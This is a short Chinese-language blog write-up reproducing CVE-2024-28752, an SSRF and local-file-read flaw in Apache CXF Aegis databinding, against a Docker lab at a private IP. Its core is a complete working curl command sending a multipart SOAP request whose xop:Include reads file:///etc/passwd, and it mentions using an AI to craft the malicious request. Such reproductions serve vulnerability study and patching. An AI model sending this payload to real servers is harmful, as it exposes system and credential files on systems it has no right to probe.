CVE-2024-28752 Apache CXF Aegis databinding SSRF漏洞 (复现)
CVE-2024-28752目录终端下执行docker compose up -d开启容器
访问ip:8080

验证该容器是否完全启动成功/查看服务期望的参数类型
访问 http://192.168.75.132:8080/test?wsdl

将参数类型丢给AI解析,生成精确的恶意攻击请求
curl发送精确请求
点击查看代码
curl -X POST http://192.168.75.132:8080/test \
-H "Content-Type: multipart/related; boundary=----WebKitFormBoundary123456" \
--data-binary @- <<EOF
------WebKitFormBoundary123456
Content-Disposition: form-data; name="1"
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://service.namespace/">
<soapenv:Header/>
<soapenv:Body>
<web:test>
<arg0>
<count>123</count>
<text>
<xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///etc/passwd"/>
</text>
<you>true</you>
</arg0>
</web:test>
</soapenv:Body>
</soapenv:Envelope>
------WebKitFormBoundary123456--
EOF
成功复现!解码即可查看/etc/passwd内容

浙公网安备 33010602011771号